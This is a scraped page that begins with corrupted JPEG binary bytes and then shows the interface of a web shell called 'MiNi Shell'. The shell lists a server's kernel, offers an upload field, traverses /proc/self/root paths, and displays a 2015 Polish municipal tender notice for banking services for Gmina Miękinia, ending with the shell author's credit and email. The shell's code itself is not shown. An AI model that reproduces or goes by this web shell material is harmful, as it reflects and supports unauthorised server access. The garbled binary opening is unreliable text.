JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150806/117321-N-2015.html

<p class="kh_header"><b>Miękinia: Obsługa  bankowa budżetu Gminy Miękinia oraz jej jednostek organizacyjnych w latach 2016 - 2020</b><br>
<b>Numer ogłoszenia: 117321 - 2015; data zamieszczenia: 06.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miękinia , ul. Kościuszki 41, 55-330 Miękinia, woj. dolnośląskie, tel. 071 3178116, 3178016, faks 071 3178016.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miekinia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa  bankowa budżetu Gminy Miękinia oraz jej jednostek organizacyjnych w latach 2016 - 2020.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie usługi - obsługi bankowej budżetu Gminy Miękinia w okresie od dnia 01.01.2016 r. do dnia 31.12.2020 r., w tym Urzędu Gminy i jednostek organizacyjnych .
2.Wykaz jednostek organizacyjnych, w których będzie świadczona obsługa bankowa: 
1) Urząd Gminy w Miękini,
2) Gmina Miękinia (Organ)
3) Samorządowy Zespół Oświaty,
4) Szkoła Podstawowa w Miękini,
5) Publiczne Gimnazjum w Miękini,
6) Publiczne Przedszkole w Miękini,
7) Szkoła Podstawowa w Lutyni,
8) Gimnazjum w Lutyni
9) Szkoła Podstawowa w Pisarzowicach,
10) Przedszkole Publiczne w Pisarzowicach,
11) Żłobek Publiczny w Pisarzowicach,
12) Gminny Ośrodek Pomocy Społecznej w Miękini
13) Samorządowy Ośrodek Kultury. 
Zamawiający zastrzega sobie prawo do zmiany ilości rachunków pomocniczych. W przypadku utworzenia nowych rachunków ich obsługa bankowa będzie prowadzona na warunkach zgodnych z niniejszą SIWZ i zawartą umową.
3. Przedmiot zamówienia w szczególności obejmuje wykonywanie następujących czynności i świadczenia następujących usług na rzecz Zamawiającego:
1) otwarcie i prowadzenie rachunków bankowych, w tym:
a) rachunku bieżącego budżetu Gminy Miękinia w złotych polskich, w którym Zamawiający będzie uprawniony do zaciągania odnawialnego kredytu w kwocie nieprzekraczającej wysokości 2 000 000 PLN, przeznaczonego ma pokrycie występującego w ciągu roku przejściowego deficytu budżetu,
b) rachunków bieżących w złotych polskich (dochodów i wydatków) Zamawiającego i jego jednostek organizacyjnych,
c) rachunków pomocniczych oprocentowanych i nieoprocentowanych w złotych polskich , w tym rachunków przeznaczonych do obsługi projektów realizowanych  przy współudziale środków z Unii Europejskiej i innych źródeł,
d) rachunków sum depozytowych w złotych polskich do obsługi wadiów i zabezpieczeń należytego wykonania umów,
2) udzielenie w każdym roku obowiązywania umowy odnawialnego kredytu w rachunku bieżącym budżetu Gminy:
a)Wykonawca zobowiązuje się udzielić Zamawiającemu kredytu w rachunku bieżącym w wysokości nieprzekraczającej 2 000 000 PLN,
b) Kredyt przeznaczony będzie na pokrycie występującego w ciągu roku przejściowego deficytu budżetu gminy Miękinia  zgodnie z art. 89 ust. 1 ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych - Dz. U. z 2013 r., poz. 885 z późniejszymi zmianami
c) Kredyt będzie miał charakter odnawialny w każdym roku i będzie zapisany w uchwale budżetowej na dany rok budżetowy, która będzie zamieszczana na stronie internetowej http://bip.miekinia.pl w zakładce Budżet Gminy, każdorazowo uruchamiany będzie w dniu podpisania pomiędzy stronami umowy lub aneksu do umowy ustalającego wysokość kredytu na dany rok, w wysokości nie wyższej niż 2 000 000,00 PLN.
d) Kredyt w rachunku bieżącym będzie wystawiony bez prowizji i opłat,
e) Oprocentowanie kredytu będzie opierało się o zmienną stopę procentową stawki WIBOR O/N powiększoną o stałą w okresie obowiązywania umowy marżę zaproponowaną przez Wykonawcę, podaną z dokładnością do dwóch miejsc po przecinku. Do naliczania odsetek założono, że miesiąc ma rzeczywistą liczbę dni, a rok 365 dni, 
f) Odsetki od wykorzystanego kredytu będą płatne miesięcznie do 15 - go dnia miesiąca po zakończeniu każdego miesiąca w ciężar rachunku wskazanego przez Zamawiającego. Jeżeli dzień ten wypada w dzień wolny od pracy, to płatność będzie realizowana w następnym dniu roboczym. Wyjątek stanowi miesiąc grudzień, w którym odsetki będą płatne najpóźniej w ostatnim dniu roboczym miesiąca.
g) Kredyt będzie uruchamiany w dowolnej wysokości do kwoty maksymalnego limitu zadłużenia wynikającego z umowy kredytowej, bez wcześniejszej konieczności zawiadamiania o zamiarze jego uruchomienia,
h) Każdy wpływ na  rachunek bieżący budżetu Zamawiającego będzie jednocześnie spłatą całości lub części wykorzystanego kredytu odnawialnego,
i) Zamawiający złoży w umowie o kredyt w rachunku bieżącym budżetu oświadczenie o poddaniu się egzekucji w trybie art. 97 ustawy z dnia 29 sierpnia 1997 roku Prawo bankowe (t.j. Dz. U. z 2012 r. poz. 1376 z późniejszymi zmianami) 
3) Zapewnienie systemu bankowości elektronicznej do obsługi rachunków bankowych
Wiodącym systemem finansowo - księgowym używanym przez Zamawiającego i jego jednostki organizacyjne jest system SIGID, dostarczany przez Zakład Systemów Informatycznych SIGID Sp. z o. o. z siedzibą w Poznaniu.
Zamawiający zastrzega sobie prawo do wprowadzenia, w okresie trwania umowy, zmian dotyczących połączenia systemu bankowego w przypadku zmiany u Zamawiającego systemu finansowo - księgowego, umożliwiających bezpośrednie przekazywanie informacji  m. in. Import, eksport danych, automatyczną identyfikację kontrahenta, rodzaj płatności, automatyczne wczytywanie przelewów z systemu finansowo - księgowego. Powyższe zmiany Wykonawca zobowiązany będzie uwzględnić w ramach prowadzonej obsługi bankowej, bez nakładania na Zamawiającego dodatkowych opłat i prowizji.
a) Uzyskiwanie w czasie rzeczywistym informacji o wszystkich operacjach i saldach na rachunkach bieżących i rachunkach pomocniczych zarówno Zamawiającego, jak i jego jednostek organizacyjnych,
b) Dostęp dla upoważnionych pracowników Zamawiającego do podglądu bieżących sald na rachunkach, jak i jego jednostek organizacyjnych,
c) Przeszukiwanie zbiorów wszystkich operacji na wszystkich w/w rachunkach wg różnych kryteriów wyszukiwania, co najmniej: rodzaju operacji, nazwy kontrahenta, daty, okresu, kwoty, po dowolnym fragmencie nazwy kontrahenta, tytułu płatności, fragmencie numeru rachunku i innych możliwych do wyodrębnienia kryteriach, przy czym w okresie obowiązywania umowy wykonawca zobowiązany jest zapewnić możliwość przeszukiwania zbiorów danych z całego okresu objętego obsługą bankową  5 lat oraz prowadzić w tym okresie archiwum,
d) Składanie poleceń przelewu w ramach dostępnych środków i przyznanego kredytu w rachunku bieżącym, w tym również poleceń przelewu z odroczoną datą płatności,
e) Realizacja wypłat świadczeń pieniężnych na rzecz świadczeniobiorców,
f) Import przelewów przygotowanych w systemie finansowo - księgowym Zamawiającego do systemu bankowego,
g) Informowanie o wszystkich istotnych sprawach związanych z systemem bankowości elektronicznej  np. awarie, aktualizacje, przelewy odrzucone przez Bank,
h) Dokonywanie wszelkich modyfikacji uprawnień użytkownika, dodanie nowych użytkowników do systemu, zmiany schematów akceptacji grup osób akceptujących, limitów będzie odbywała się drogą elektroniczną,
i) Odblokowanie użytkowników w systemie będzie się odbywać w systemie bankowości elektronicznej poprzez wprowadzenie danych dostarczonych drogą elektroniczną, 
j) Zakładanie lokat terminowych standard będzie się odbywać w sposób automatyczny w systemie; lokata założona zostaje od razu po założeniu i jest widoczna w systemie,
k) Zamawiający będzie miał możliwość definiowania okna pracy  swoich użytkowników w systemie, tzn. tak, aby logowanie do systemu było możliwa tylko w określone dni tygodnia/ godziny pracy,
l) Blokowanie dostępu do systemu nastąpi po 3 nieudanych próbach podania hasła,
m) Zamawiający będzie miał możliwość zdefiniować adresy IP komputerów, z których będą logować się użytkownicy.
Ponadto w ramach usługi bankowości elektronicznej Wykonawca zapewni:
- przeszkolenie wskazanych przez Zamawiającego pracowników w zakresie obsługi sytemu bankowości elektronicznej w zależności od potrzeb Zamawiającego. Liczba osób korzystających z systemu : Urząd Gminy - 9 osób, Samorządowy Zespół Oświaty - 5 osób, Samorządowy Ośrodek Kultury - 3 osób, Gminny Ośrodek Pomocy Społecznej - 5 osób.
- kompatybilność systemu bankowości elektronicznej z systemem finansowo - księgowym Urzędu Gminy i jego jednostek organizacyjnych, która pozwoli na:
- wymianę danych w formacie zapewniającym pełną integrację  systemu bankowości elektronicznej z systemem finansowo - księgowym Zamawiającego ( SIGID),
- eksport poleceń przelewów przygotowanych w systemie finansowo - księgowym Zamawiającego do systemu bankowości elektronicznej,
- import potwierdzeń przelewów z systemu bankowości elektronicznej do systemu finansowo - księgowego Zamawiającego,
- import wyciągów bankowych w formie elektronicznej z systemu bankowości elektronicznej do systemu finansowo - księgowego Zamawiającego,
- instalację i uruchomienie stanowisk bankowości elektronicznej oraz poprawne działanie oprogramowania  bankowości elektronicznej na stanowiskach komputerowych  wskazanych przez Zamawiającego,
- alternatywne realizowanie przelewów elektronicznych przygotowanych przez systemy informatyczne Zamawiającego i jego jednostki organizacyjne w razie awarii sieci komputerowej wykluczającej możliwość standardowego wykorzystania kanału elektronicznego wykorzystywanego przez system bankowości elektronicznej ( np. możliwość przygotowania nośnika danych i jego fizyczne dostarczenie do placówki bankowej Wykonawcy)
4)	Realizacja   poleceń    przelewów    krajowych   z   rachunków Zamawiającego i jednostek organizacyjnych (składanych elektronicznie i papierowo):
5) Zapewnienie usługi płatności masowych:
6)	Zapewnienie bez kosztowej obsługi gotówkowej w zakresie wpłat i wypłat. 
a) Wykonawca zapewni, przynajmniej dwie placówki bankowe, w których będzie można dokonywać wpłat i wypłat oraz zapewni ich utrzymanie przez cały okres realizacji zamówienia.
b) Wykonawca zapewni przyjmowanie płatności na rzecz Zamawiającego za pośrednictwem terminali POS
7)Generowanie i przekazywanie  Zamawiającemu i jego jednostkom organizacyjnym wyciągów bankowych,
8) Zapewnienie doradcy bankowego dla Zamawiającego:
9) Przygotowanie na pisemną prośbę Zamawiającego opinii, zestawień, zaświadczeń i raportów w zakresie prowadzonej obsługi bankowej,
10) Wystawianie blankietów czeków gotówkowych,
11) Zerowanie rachunków bankowych zgodnie z dyspozycjami Zamawiającymi, polegające na przekazaniu w dniu 31 grudnia kwot pozostałych na wskazanych rachunkach na rachunek Budżetu.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2020.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiada zezwolenie na prowadzenia działalności bankowej określone w przepisach ustawy z dnia 29 sierpnia 1997 r. (tekst jednolity Dz. U. z 2012 r poz. 1376 z późniejszymi zmianami).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum:  jedno zamówienia, którego przedmiotem była usługa polegająca na obsłudze budżetów jednostek samorządu terytorialnego i innych jednostek sektora Finansów Publicznych wykonywanych co najmniej przez okres 3 lat.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz ofertowy 
2)	Pełnomocnictwo - w przypadku,  gdy reprezentant Wykonawcy działa na podstawie pełnomocnictwa lub w przypadku składania oferty wspólnej (wówczas pełnomocnictwo musi zostać udzielone do reprezentowania wykonawcy w postępowaniu o zamówienie publiczne albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego).
Zamawiający dopuszcza złożenie przedmiotowego dokumentu w formie oryginału lub kopii poświadczonej przez notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - udostępnienie placówek bankowych - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miekinia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Miękini, 55-330 Miękinia, ul. Kościuszki 41, pokój 209..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.08.2015 godzina 12:00, miejsce: Urząd Gminy w Miękini, 55-330 Miękinia, ul. Kościuszki 41, Biuro Obsługi Klienta..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com